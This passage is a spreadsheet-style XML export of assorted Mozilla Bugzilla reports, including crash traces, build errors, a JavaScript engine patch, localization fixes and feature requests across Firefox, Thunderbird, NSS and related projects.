msgimap.dll!nsImapService::SelectFolder(nsIEventTarget * aClientEventTarget=0x00cd3358 nsIMsgFolder * aImapMailFolder=0x051a622c nsIUrlListener * aUrlListener=0x00000000 nsIMsgWindow * aMsgWindow=0x00000000 nsIURI * * aURL=0x0012ecdc)  Line 259 + 0x1b bytes	C++
msgimap.dll!nsImapMailFolder::UpdateFolder(nsIMsgWindow * msgWindow=0x00000000 nsIUrlListener * aUrlListener=0x00000000)  Line 771 + 0x85 bytes	C++
msgimap.dll!nsImapMailFolder::UpdateFolder(nsIMsgWindow * inMsgWindow=0x00000000)  Line 674	C++
The problem is that CanHandleUrl sometimes will actually remove the connection from the connection cache while we're iterating through it. A simple fix is to check for this. I'll attach a patch. I could also the loop to start looking from the end I think I'll try that as well.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-114818</t>
  </si>
  <si>
    <t>[Xlib] Xlib port tinderbox</t>
  </si>
  <si>
    <t>RFE: It may be a nice idea to turn one of the Unix/Linux tinderbox machines into
a Xlib tinderbox e.g. build with configure --enable-toolkit=xlib gmake.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-326006</t>
  </si>
  <si>
    <t>[FIX]nsIWindowProvider should indicate whether an existing window is being reused</t>
  </si>
  <si>
    <t>This way we can better track which windows were really opened by web pages and which were opened by users.</t>
  </si>
  <si>
    <t>CORE-153841</t>
  </si>
  <si>
    <t>Translate nsIAccessible states to ATK states</t>
  </si>
  <si>
    <t>john.sun</t>
  </si>
  <si>
    <t>CORE-99948</t>
  </si>
  <si>
    <t>unnecessary wrapping in tables</t>
  </si>
  <si>
    <t>The contents of several tables on my home page wrap when they shouldn't.  In 
each case it looks like the table tried to make enought room for the contents 
to not wrap but the contents decided to wrap anyway.</t>
  </si>
  <si>
    <t>alexsavulov</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-290520</t>
  </si>
  <si>
    <t>View -&gt; Hide/Show Toolbar shortcut should use shift instead of option.</t>
  </si>
  <si>
    <t>Since Hide/Show Toolbar is currently command-option-T it hides or shows the
toolbars on *all* windows instead of just the front one (because Cocoa
interprets option as apply to all for certain window commands option-click
the toolbar widget or the close/minimize/zoom buttons to see).
Changing it to use shift instead of option fixes this. If this change is made
Hide/Show Bookmark Bar should probably be changed to use shift instead of
option as well for consistency.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-427800</t>
  </si>
  <si>
    <t>mr / Marathi</t>
  </si>
  <si>
    <t>[mr] engineManager.style should not be translated</t>
  </si>
  <si>
    <t xml:space="preserve">In your locale this entity in browser/chrome/browser/engineManager.dtd:
is translated into your local language. This is not what you
should do here. This is CSS style code telling how wide 
that window should be - so you should only change the number
'35' do not translate the words 'min-height'.
For example this is OK (if you want the window to be at least 36em wide):
and this is WRONG:
</t>
  </si>
  <si>
    <t>SEAMONKEY-121324</t>
  </si>
  <si>
    <t>Tracking bug for ANY changes to prefs (additions deletions change in usage)</t>
  </si>
  <si>
    <t>mitchf</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-271267</t>
  </si>
  <si>
    <t>[Submission] Detect whether uploaded file is theme or extension</t>
  </si>
  <si>
    <t>When someone is uploading a file with an install.rdf we can tell whether it is
a theme or not at least for FX and TB.
Themes have an instance of em:internalName.
If someone tries to upload a new item incorrectly this will catch it and
prevent us from having to go back and fix it manually.</t>
  </si>
  <si>
    <t>CORE-342172</t>
  </si>
  <si>
    <t>nsLocalFile - Enable Reveal and Launch for WINCE</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-129366</t>
  </si>
  <si>
    <t>Allow unprivileged users to file bugs into Mozilla security groups</t>
  </si>
  <si>
    <t>Each security group should have an option that if enabled allows unprivileged
users to file bugs into that group.  This makes it possible to set up a group
for security-sensitive bugs (i.e. bugs that compromise the security of users of
the product) and allow members of the public to put bugs into it without the bug
being public for any period of time.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-115552</t>
  </si>
  <si>
    <t>adobe.com - partners.adobe.com warns NN4/IE4 only support</t>
  </si>
  <si>
    <t>I've noticed that some pages on partners.adobe.com have the following code:
//obsolete browser variable
var sb
sb=0
if ( ! document.layers &amp;&amp; ! document.all ) {
  sb=1
 document.write('&lt;TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0
WIDTH=400 HEIGHT=75 BGCOLOR=#ffffcc&gt;  &lt;TD VALIGN=middle
WIDTH=50&gt;&lt;FONT FACE=VerdanaGenevaArialSans Serif
SIZE=2&gt; &lt;FONT FACE=VerdanaGenevaArialSans
Serif SIZE=2&gt;To view these pages properly your browser needs to
support Javascript. This may mean that you need to upgrade to &lt;A
HREF=/cgi-bin/redirect/cp=hom09pbro?http://www.netscape.com/computing/download/index.html&gt;Netscape
Communicator 4.0 or later or &lt;A
HREF=/cgi-bin/redirect?http://www.microsoft.com/downloads/&gt;Microsoft
Internet Explorer 4.0 or later. Also In your browser Preferences
enable JavaScript. Please see our error
page for more information.  ')
}
Obviously neither document.layers nor document.all exist in Mozilla.  I've
e-mailed them but lacking a better venue I just sent it to webmaster@adobe.com.</t>
  </si>
  <si>
    <t>CORE-663789</t>
  </si>
  <si>
    <t>activation objects management might not correctly set actual argument number</t>
  </si>
  <si>
    <t>Created attachment 538871
Incompletely reduced TenFourFox test case (does not fail on Firefox 5 yet)
Per Luke's request in bug 636296 comment 29. To recapitulate I am tracking a TenFourFox bug where the number of arguments in the argsobj is sometimes a ridiculously high number causing malloc() in NewArguments() to fail. The large number after analysis seemed to have come from args.nactual in jsinterpinlines.h. This problem did not occur in Mozilla 2.0 leading me to suspect bug 636296 part 4 because that part reduced the number of situations where that value was updated. Our current wallpaper is this
diff --git a/js/src/jsinterpinlines.h b/js/src/jsinterpinlines.h
--- a/js/src/jsinterpinlines.h
+++ b/js/src/jsinterpinlines.h
@@ -39317 +39323 @@ JSStackFrame::varobj(JSContext *cx) cons
     return isFunctionFrame() ? callObj() : cx-&gt;activeSegment()-&gt;getInitialVarObj()
 }
 inline uintN
 JSStackFrame::numActualArgs() const
 {
     JS_ASSERT(hasArgs())
     if (JS_UNLIKELY(flags_ &amp; (JSFRAME_OVERFLOW_ARGS | JSFRAME_UNDERFLOW_ARGS)))
+#if(0)
         return hasArgsObj() ? argsObj().getArgsInitialLength() : args.nactual
+#else
+        return hasArgsObj() ? argsObj().getArgsInitialLength() :
+            (args.nactual &lt; 1024*1024) ? args.nactual :
+            numFormalArgs()
+#endif
     return numFormalArgs()
 }
 inline js::Value *
 JSStackFrame::actualArgs() const
 {
     JS_ASSERT(hasArgs())
     js::Value *argv = formalArgs()
which does work but seems wrong. Is there blindly a better way?
I have attached the test case that we are using but it does not actually fail on Firefox 5 (it is from TED.com). Unfortunately this test case is not completely minimized (the HTML is but I can only get it to trigger with a specific minified Dojo that I am trying to reduce further). However we don't have mjit in TenFourFox only tracejit so it's possible that this is a situation that tracejit doesn't do right. I'm trying to see if I can make it fail with the supported browser.
If this is not a Firefox bug and it might not be is our putative solution correct? Is there a better way?
Thanks!</t>
  </si>
  <si>
    <t>spectre</t>
  </si>
  <si>
    <t>CORE-405260</t>
  </si>
  <si>
    <t>Problems building nsBidiKeyboard.cpp with MingW GCC</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.9) Gecko/20071030 SeaMonkey/1.1.6
Build Identifier: 
When building SeaMonkey trunk and getting to nsBidiKeyboard.cpp I get the following errors:
c:/mozilla/widget/src/windows/nsBidiKeyboard.cpp: In member function 'nsresult nsBidiKeyboard::SetupBidiKeyboards()':
c:/mozilla/widget/src/windows/nsBidiKeyboard.cpp:150: warning: comparison between signed and unsigned integer expressions
c:/mozilla/widget/src/windows/nsBidiKeyboard.cpp:159: error: cast from 'HKL__*' to 'WORD' loses precision
c:/mozilla/widget/src/windows/nsBidiKeyboard.cpp:163: error: cast from 'HKL__*' to 'WORD' loses precision
c:/mozilla/widget/src/windows/nsBidiKeyboard.cpp: In member function 'PRBool nsBidiKeyboard::IsRTLLanguage(HKL__*)':
c:/mozilla/widget/src/windows/nsBidiKeyboard.cpp:213: error: cast from 'HKL__*' to 'WORD' loses precision
Is this a mozilla problem (in which case what is the right fix) or a problem with MingW having the wrong definition for something somewhere (in which case what is the change that MingW has to make)?
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>jfwfreo</t>
  </si>
  <si>
    <t>CORE-471227</t>
  </si>
  <si>
    <t>test_Prototype.html intermittently fails</t>
  </si>
  <si>
    <t>For example:
{
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox3.1/1230338221.1230341196.28431.gz
OS X 10.5.2 mozilla-1.9.1 unit test on 2008/12/26 16:37:01
*** 31172 ERROR TEST-UNEXPECTED-FAIL | /tests/dom/tests/mochitest/ajax/prototype/test_Prototype.html | testSynchronousRequest - 2 assertions 1 failures 1 errors
*** 31173 ERROR TEST-UNEXPECTED-FAIL | /tests/dom/tests/mochitest/ajax/prototype/test_Prototype.html | testAsynchronousRequest - 1 assertions 0 failures 1 errors
*** 31174 ERROR TEST-UNEXPECTED-FAIL | /tests/dom/tests/mochitest/ajax/prototype/test_Prototype.html | testUpdater - 3 assertions 2 failures 0 errors
*** 31175 ERROR TEST-UNEXPECTED-FAIL | /tests/dom/tests/mochitest/ajax/prototype/test_Prototype.html | testResponders - 7 assertions 3 failures 0 errors
*** 31176 ERROR TEST-UNEXPECTED-FAIL | /tests/dom/tests/mochitest/ajax/prototype/test_Prototype.html | testEvalResponseShouldBeCalledBeforeOnComplete - 1 assertions 2 failures 1 errors
}</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-517893</t>
  </si>
  <si>
    <t>update onebillionplusyou.com to revision 51934 on trunk</t>
  </si>
  <si>
    <t>Please push to production the state of trunk at revision 51934 on trunk.
Thanks</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-509086</t>
  </si>
  <si>
    <t>Roundcube webmail: Make roundcube support mailto protocol</t>
  </si>
  <si>
    <t>When using Roundcube webmail as mailto protocol handler the whole mailto string (including the mailto protocol is added to the TO field). We should ask them to support external mailto strings.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-478373</t>
  </si>
  <si>
    <t>The command line should get as much space as possible</t>
  </si>
  <si>
    <t>The command line type=text is set to 70%. We need to make it as wide as possible so you can click anywhere in the command line and stretch it out. The issue is that if you make it 100% right now it pushes down the items on the right. Need to flush out and test.</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-688578</t>
  </si>
  <si>
    <t>byob.mozilla.com</t>
  </si>
  <si>
    <t>Email being sent from BYOB</t>
  </si>
  <si>
    <t>Here's a bug report from the webmaster email address:
The Build Your Own Browser site keeps emailing me about the browser that I looked at configuring months ago but the site doesn't work worth squat.  I don't even know who to contact to get the emails to stop of find a way to use the BYOB.  If BYOB is out then it needs to stop sending email.  If it is active it needs a website.  I'd just like one or the other and not emails that direct me to a dead site that I just keep getting.</t>
  </si>
  <si>
    <t>Terry.F1Com</t>
  </si>
  <si>
    <t>NSS-202058</t>
  </si>
  <si>
    <t>Compile source files with absolute pathnames to ease debugging</t>
  </si>
  <si>
    <t>This bug is the NSS counterpart bug to bug 105271 which is for NSPR . I'm
breaking up the bug because that bug has become too large.
In the following environments the debugger does not automatically locate source
files. This occurs whether NSS is built standalone or as part of another product
(eg. mozilla). The debugger prompts the developer to manually locate the files
under :
- All Windows plaforms with Microsoft compilers and Microsoft debugger
including Cygwin &amp; MKS build environments
- OS/2 with IBM VACPP compiler using IBM debuggers
- OS/2 with gcc compiler using IBM debuggers
The fix is to pass an absolute path to the source file to the compiler.</t>
  </si>
  <si>
    <t>THUNDERBIRD-379806</t>
  </si>
  <si>
    <t>threaded/grouped-by-sort views unavailable in saved searches across multiple folders</t>
  </si>
  <si>
    <t>User-Agent:       Opera/9.20 (Windows NT 5.1 U en)
Build Identifier: version 2.0.0.0 (20070326)
When I create a Saved Search that includes several folders to be searched I cannot use the Threaded view or the Grouped By Sort view. (I don't know if this makes a difference but I have only an IMAP account to try this out on though I imagine this doesn't matter.)
Reproducible: Always
Steps to Reproduce:
1. Create a Saved Search spanning multiple folders.
2. Click on the View &gt; Sort by.
Actual Results:  
You find that the bottom 3 menu items are disabled.
Expected Results:  
You find that the bottom 3 menu items are enabled.
A threaded view where you can see all messages in the thread - which is only possible by creating a Saved Search over both the Inbox and the Sent folders - is generally more practical and useful than one where you only see all received messages.</t>
  </si>
  <si>
    <t>bugzilla.overbored</t>
  </si>
  <si>
    <t>FIREFOX-244090</t>
  </si>
  <si>
    <t>Windows Start Menu Shortcut for Safe Mode</t>
  </si>
  <si>
    <t>Safe Mode (no extensions) should have a start menu shortcut created by the
installer. The name of the shortcut that appears in the menu should be: Firefox
(No Extensions)</t>
  </si>
  <si>
    <t>NSS-312395</t>
  </si>
  <si>
    <t>Enhance fipstest to perform FIPS AES algorithm testing</t>
  </si>
  <si>
    <t>We need to enhance nss/cmd/fipstest/fipstest.c to
be able to perform the various tests in the FIPS
AES Algorithm Validation Suite (AESAVS):
http://csrc.nist.gov/cryptval/aes/AESAVS.pdf
NSS support the following:
key size: 128 192 and 256 bits
mode of operation: ECB and CBC
There are three types of tests:
- Known Answer Test (KAT): this in turn has four types
  * GFSbox
  * KeySbox
  * Variable Key
  * Variable Text
  They all have the same structure.  Plaintext or
  ciphertext is exactly one block long.
- Multi-block Message Test (MMT): this has the same
  structure as the KAT.  The only difference is that
  the plaintext or ciphertext has multiple blocks.
- Monte Carlo Test (MCT): this tests 100 blocks generated
  from the given test input using an algorithm specified
  in the Validation Suite.  It tests our encryption and
  decryption functions in streaming mode.</t>
  </si>
  <si>
    <t>CORE-264072</t>
  </si>
  <si>
    <t>nsContainerFrame::SyncFrameViewProperties handles 'visibility:collapse' wron</t>
  </si>
  <si>
    <t>nsContainerFrame::SyncFrameViewProperties handles 'visibility: collapse'
differently from 'visibility: hidden' when according to
http://www.w3.org/TR/CSS21/visufx.html#visibility they should almost always be
the same.</t>
  </si>
  <si>
    <t>PENELOPE_GRAVEYARD-359254</t>
  </si>
  <si>
    <t>Filters: Skip Rest option (or other way to deal with Filter order considerations)</t>
  </si>
  <si>
    <t>Penelope needs a 'Skip Rest' option in the Filters to allow one Filter to prevent a Filers lower in the list from acting on a message.</t>
  </si>
  <si>
    <t>SEAMONKEY-251757</t>
  </si>
  <si>
    <t>Help window default size does not fit its contents</t>
  </si>
  <si>
    <t>The help window viewer default size is too small for much of its content so many
pages have a horizontal scrollbar. 
Tested with 2004071509 windows Aviary branch build on XP.
We should increase the width of that window so that all the pages (images seem
to be doing it) fit or we should crop the images.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-213925</t>
  </si>
  <si>
    <t>tinderbox builds should also double as daily release builds</t>
  </si>
  <si>
    <t>due to resource constraints mozilla.org tinderbox clients should also be able
to upload and announce binary ftp locations for the builds they produce if
necessary.</t>
  </si>
  <si>
    <t>CORE-67972</t>
  </si>
  <si>
    <t>deck inside stack doesn't work as expected in XUL-file</t>
  </si>
  <si>
    <t xml:space="preserve">From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U WinNT4.0 en-US m18) Gecko/20010207
BuildID:    20010207
If a deck is defined inside a stack other elements of the stack are not
rendered above this deck element. The deck element is always on top of the other
elements defined in the stack even if it is the first element of the stack. See
also http://www.cmeerw.f2s.com/test/stackdeck2.xul which also contains a stack
with the same texts but without a deck inside the stack.
Reproducible: Always
Steps to Reproduce:
open http://www.cmeerw.f2s.com/test/stackdeck1.xul
Actual Results:  The red text (text (deck) defined inside the deck) is
rendered above the black text text (stack).
Expected Results:  The black text (text (stack)) should be rendered above the
red text (text (deck)) as in http://www.cmeerw.f2s.com/test/stackdeck2.xul
(without the deck)
Here is the XUL-code once again:
</t>
  </si>
  <si>
    <t>cmeerw</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-352560</t>
  </si>
  <si>
    <t>Tracking Bug: Remora Developer Pages</t>
  </si>
  <si>
    <t>This is a tracking bug for Developer Control Panel bugs that will be/have been fixed in Remora (AMO v3).
Please do not comment on this bug - instead use the wiki or #amo @ irc.mozilla.org.</t>
  </si>
  <si>
    <t>CORE-59665</t>
  </si>
  <si>
    <t>select list's selectedIndex setter does not attempt to convert strings to numbers</t>
  </si>
  <si>
    <t>ETrade stores your last start in select box value in a cookie each time you
change it.  When revisiting the site it reads this cookie and tries to reset it
to whatever you had last.  The line where the select box state is restored is:
document.forms[0].goWhere.selectedIndex = selectGoWhere
Where |selectGoWhere| is split out of the cookie and never converted from a
string to a number.  The DOM glue code generated by JSStubGen doesn't attempt to
convert strings to numbers and so this line of JS fails with an
NS_ERROR_DOM_NOT_NUMBER_ERR error.
The attached patch should fix this by allowing JS to do attempt a conversion to
an int32 if the value is a string.  If this conversion should fail
NS_ERROR_DOM_NOT_NUMBER_ERR will then be reported.  (The same way a
JSVAL_IS_NUMBER would fail if it were outside the range of an int32 btw.)</t>
  </si>
  <si>
    <t>THUNDERBIRD-246414</t>
  </si>
  <si>
    <t>Drafts &amp; Templates don't remember background and font colors</t>
  </si>
  <si>
    <t>If you set a background or font color on a message then save as a draft or a
template. Then restore the compose window you'll see the draft loses the
background &amp; font color information.
This is because of Bug #236498 which forces the default HTML background and font
color styles on a compose window.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-442121</t>
  </si>
  <si>
    <t>Don't call into mailnews from toolkit-makefiles.sh</t>
  </si>
  <si>
    <t>toolkit-makefiles.sh in mozilla-central still calls the mailnews makefiles.sh that doesn't exist that that place any more we should remove that from 1.9.1 and let any mailnews-enabled product care about it themselves.</t>
  </si>
  <si>
    <t>NSS-158339</t>
  </si>
  <si>
    <t>RNG_RNGInit() failure causes bad free (bus error)</t>
  </si>
  <si>
    <t>When the RNG_RNGInit() call in  nsc_commonInitialize() fails
goto loser: causes a bus error because paramStrings we never
init_args.  See  softoken/pkcs11.c
    rv = RNG_RNGInit()         /* initialize random number generator */
    if (rv != SECSuccess) {
        crv = CKR_DEVICE_ERROR
        goto loser
    }
    RNG_SystemInfoForRNG()</t>
  </si>
  <si>
    <t>TOOLKIT-384948</t>
  </si>
  <si>
    <t>Clean up findBar.css</t>
  </si>
  <si>
    <t>Created attachment 268857
Some findBar.css cleanup
I've been looking at findBar.css in order to sort out bug 381915 and I couldn't help clean it up a bit - lots of style rules that can be made less expensive.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-403947</t>
  </si>
  <si>
    <t>please add JSS versions and target milestones: 4.2.6 4.2.7 4.2.8 4.2.9 and 4.2.10</t>
  </si>
  <si>
    <t>Please add the following versions and target milestones
to the JSS product:
4.2.6
4.2.7
4.2.8
4.2.9
4.2.10</t>
  </si>
  <si>
    <t>CORE-509581</t>
  </si>
  <si>
    <t>IPDL shouldn't generate empty switch statements causes MSVC to issue a warning</t>
  </si>
  <si>
    <t>warning C4065: switch statement contains 'default' but no 'case' labels
I see a bunch of those every time I compile. We should figure out a way to avoid generating empty switch statements.</t>
  </si>
  <si>
    <t>THUNDERBIRD-498141</t>
  </si>
  <si>
    <t>Message Reader UI</t>
  </si>
  <si>
    <t>Close Window On Delete Preference No Longer Works</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 8.0 Windows NT 6.0 Trident/4.0 SLCC1 .NET CLR 2.0.50727 Media Center PC 5.0 .NET CLR 1.1.4322 .NET CLR 3.5.21022 .NET CLR 3.5.30729 .NET CLR 3.0.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1pre) Gecko/20090613 Lightning/1.0pre Shredder/3.0b3pre
The close window on delete preference (created with bug 274628) no longer works.
Reproducible: Always
Steps to Reproduce:
1.  Select the close window on delete preference.
2.  Delete a message in a standalone window.
3.  The next message appears in the window instead of closing the window.
Actual Results:  
The window does not close.
Expected Results:  
The window should close.</t>
  </si>
  <si>
    <t>TOOLKIT-292913</t>
  </si>
  <si>
    <t>Potential OOM crash [@ LoadDirsIntoArray]</t>
  </si>
  <si>
    <t>&gt; RCS file: /cvsroot/mozilla/toolkit/xre/nsXREDirProvider.cppv
&gt; +      nsCOMPtr
&gt; dir(do_CreateInstance(@mozilla.org/file/local1))
&gt; +      rv = dir-&gt;SetPersistentDescriptor(nsDependentCString(parserBuf))
can we please not crash when alloc fails?</t>
  </si>
  <si>
    <t>CORE-436817</t>
  </si>
  <si>
    <t>crash in [@ @0x0] - [@ Create4xPlugin] (Windows Media Player plugin)</t>
  </si>
  <si>
    <t>crash in [@ @0x0]
I think related to bug 433880.
however it is not Flash Player.
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1a1pre) Gecko/2008060104 Minefield/3.1a1pre
Steps to Reproduce:
1. open http://www.hmv.co.jp/product/detail/2732259
2. click a 448k left of WMP icon
3. crash
Reproducible: Always
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1a1pre) Gecko/2008060104 Minefield/3.1a1pre
ID: 46b8d963-3031-11dd-bfec-001cc45a2ce4
Signature: @0x0
Details :
Signature	@0x0
UUID	46b8d963-3031-11dd-bfec-001cc45a2ce4
Time	2008-06-01 16:19:45-07:00
Uptime	876
Product	Firefox
Version	3.1a1pre
Build ID	2008060104
OS	Windows NT
OS Version	5.1.2600 Service Pack 2
CPU	x86
CPU Info	GenuineIntel family 6 model 8 stepping 10
Crash Reason	EXCEPTION_ACCESS_VIOLATION
Crash Address	0x0
Comments	
Frames :
Crashing Thread
Frame 	Module 	Signature 	Source
0 		@0x0 	
1 	xul.dll 	xul.dll@0x66c145 	
2 		@0x31 	
on Firefox/2008053004-trunk/WinXP
---
ID: b7aacc26-2e96-11dd-ba02-001321b13766
Signature: @0x0
Details :
Signature	@0x0
UUID	b7aacc26-2e96-11dd-ba02-001321b13766
Time	2008-05-30 15:20:47-07:00
Uptime	68
Product	Firefox
Version	3.1a1pre
Build ID	2008053004
OS	Windows NT
OS Version	5.1.2600 Service Pack 2
CPU	x86
CPU Info	GenuineIntel family 6 model 8 stepping 10
Crash Reason	EXCEPTION_ACCESS_VIOLATION
Crash Address	0x0
Comments	
Frames :
Crashing Thread
Frame 	Module 	Signature [Expand] 	Source
0 		@0x0 	
1 	xul.dll 	Create4xPlugin 	nsPluginHostImpl.cpp:4710
2 	xul.dll 	nsPluginHostImpl::GetPluginFactory 	nsPluginHostImpl.cpp:4827
3 	xul.dll 	nsPluginHostImpl::TrySetUpPluginInstance 	nsPluginHostImpl.cpp:4043
4 	xul.dll 	nsPluginHostImpl::SetUpPluginInstance 	nsPluginHostImpl.cpp:3911</t>
  </si>
  <si>
    <t>baffclan</t>
  </si>
  <si>
    <t>TOOLKIT-295178</t>
  </si>
  <si>
    <t>Misleading l10n note in customizeCharset.dtd</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 bg rv:1.8b2) Gecko/20050523 Firefox/1.0+
Build Identifier: Mozilla/5.0 (X11 U Linux i686 bg rv:1.8b2) Gecko/20050523 Firefox/1.0+
mozilla/toolkit/locales/en-US/chrome/global/customizeCharset.dtd has the
following content:
&lt;!-- LOCALIZATION NOTE  Character Encoding Preferences Dialog: Do NOT localize
the term Character Encoding --&gt;
I think that the l10n note should be removed -- I can't see why Character
Encoding(s) should not be translated.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>MOZILLA.ORG-339859</t>
  </si>
  <si>
    <t>hide mozilla.org/ from directory listing</t>
  </si>
  <si>
    <t>the directory listing has mozilla.org/
it should be hidden
IndexIgnore mozilla.org can be used for his</t>
  </si>
  <si>
    <t>THUNDERBIRD-378254</t>
  </si>
  <si>
    <t>Mail marked as read while not read at all</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 nl rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Build Identifier: Version 2.0.0.0 (20070326)
Since the latest (Dutch) version of Thunderbird (Version 2.0.0.0 (20070326) ) my mails are marked as read when they arrive in my mailbox. I see them arriving and they are marked as unread. After the message in the right corner shows me the mail information (sender short summary of the mail) the mail is marked as read.
When I disable the option that shows the message in the right corner the mail keeps marked as unread until I read the message.
It only happens with all my IMAP accounts not with RSS feeds or POP3.
Reproducible: Always
Steps to Reproduce:
1. Turn on the option to show the message in the right corner with mail summary and sender.
2. Send yourself a new email to an IMAP account.
3. When you receive the mail the mail will be shown as read when the message in the right corner dissapears.
4. Now disable this option in the preference menu.
5. Send yourself a new email to an IMAP account.
6. When you receive the mail the mail will be shown as unread even after a few seconds.
Expected Results:  
Normally all the incoming mails keep unread until I read them or mark them as read.</t>
  </si>
  <si>
    <t>bart.huybrechts</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-470011</t>
  </si>
  <si>
    <t>playback of offline imap operations needs to check if dest folder exists</t>
  </si>
  <si>
    <t>Created attachment 353446
proposed fix
We can get into situations where we have an offline imap move/copy operation to a folder that doesn't exist. Since we do all move/copy operations pseudo offline this can affect non-offline users as well. E.g. rogue code :-) like the patch in bug 451995 can do this. Whatever the cause the problem is that we will keep retrying the move/copy every time the source folder is selected and it will never succeed. It also prevents us from getting new mail for that folder.
The patch makes us drop the move/copy offline operations if the dest folder doesn't exist. This will make us stop retrying.  Once the offline ops are dropped we will redownload the headers for the affected messages.
This situation should really not happen in normal circumstances so I've made it an assertion.</t>
  </si>
  <si>
    <t>BUGZILLA-277723</t>
  </si>
  <si>
    <t>Add comments why checksetup uses slow code to check for spaces and commas in flags</t>
  </si>
  <si>
    <t>Instead of what we do now in checksetup to check for spaces/commas in flags we
should just use SQL to do it:
WHERE name LIKE '% %' OR name LIKE '%%'</t>
  </si>
  <si>
    <t>nb+bz</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-434881</t>
  </si>
  <si>
    <t>Nothing happens when Back up bookmarks is clicked</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.9) Gecko/2008051206 Firefox/3.0
Build Identifier: 0.1.29
I installed the plugin on my Windows XP machine with Firefox 3 RC1. I click Tools &gt; Weave &gt; Sign in... and click Next to go to step 2 of the Weave setup wizard. When I click the Back up bookmarks button nothing happens. The following error shows up in the Error Console:
Error: uncaught exception: [Exception... Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIStringBundle.GetStringFromName]  nsresult: 0x80004005 (NS_ERROR_FAILURE)  location: JS frame :: file:///C:/Program%20Files/Mozilla%20Firefox%203%20Beta%205/modules/utils.js :: PU_getString :: line 173  data: no]
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>rgsteele</t>
  </si>
  <si>
    <t>CORE-413198</t>
  </si>
  <si>
    <t>Make layout.css.report_errors apply to debug build text terminal (stderr)</t>
  </si>
  <si>
    <t>Created attachment 298067
check gReportErrors before sending CSS errors to stderr
This is a trivial patch to make the layout.css.report_errors preference apply to the copy of CSS errors that go to stderr in debug builds.  Useful if you're looking for assertions on a site which spews out tons of CSS errors.</t>
  </si>
  <si>
    <t>CORE-473390</t>
  </si>
  <si>
    <t>[FIX]Switch XUL/HTML/MathML/SVG frame construction to be more table-driven and eliminate IsSpecialContent</t>
  </si>
  <si>
    <t>I've been thinking about this for a while.  This is not quite the same as bug 323233 but that bug could build on this patch.  That is the way we find the frame construction data could use a hashtable if desired.
I've tried to avoid making behavior changes as much as I could or at least landing them before now but there are a few left in the patch series coming up anyway.  I think they're minor enough to not be an issue.
Performance seems to be a wash as far as I can tell.  There's a bit of a codesize win and I think this code is a good bit more readable...</t>
  </si>
  <si>
    <t>CORE-202764</t>
  </si>
  <si>
    <t>nsXULDocument::HandleDOMEvent can go away</t>
  </si>
  <si>
    <t>Now that nsXULDocument inherits from nsDocument it looks like
nsXULDocument::HandleDOMEvent can go away and we can just use the superclass
implementation.  It seems to be functionally the same just a few extra checks
for local handling (which appear to be more correct).</t>
  </si>
  <si>
    <t>SEAMONKEY-255503</t>
  </si>
  <si>
    <t>tabbedbrowser progresslistener list grows forever instead of resizing when removeProgressListener is called</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-270967</t>
  </si>
  <si>
    <t>es-ES / Spanish</t>
  </si>
  <si>
    <t>Bad translation to Spanish on Manage Bookmark utility</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 es-AR rv:1.7.5) Gecko/20041108 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11 U Linux i686 es-AR rv:1.7.5) Gecko/20041108 Firefox/1.0
When you want to add a bookmark in the Manage Bookmark utility the option box
gives you 4 fields to fill which are: nombre (name) descripciÃ³n (location)
palabras clave (keywords) and descripciÃ³n (description). The first 'descripciÃ³n'
(in English 'location') should be 'direcciÃ³n' or 'URL' or whatever.
Reproducible: Always
Steps to Reproduce:
1. click on 'Bookmarks' menu
2. 'Manage Bookmarks' utility
3. 'Add Bookmark'
Actual Results:  
Well the box popup with the incorrect word
Expected Results:  
It should be 'direcciÃ³n' (location) instead of 'descripciÃ³n' (description) in
the second field.
I think I should say here that it's an error of traduction.</t>
  </si>
  <si>
    <t>aslocker</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-233985</t>
  </si>
  <si>
    <t>The link for the StackTrace was invalid - the correct link is provided</t>
  </si>
  <si>
    <t>&lt;Describe your changes here in more detail.  After you commit this bug report
click the Create Attachment link to add the changes to the report as an
attachment.&gt;
At the end of the document the link for Matt Pietrek's stacktrace article on
MSJ is invalid now. The new link has been provided.</t>
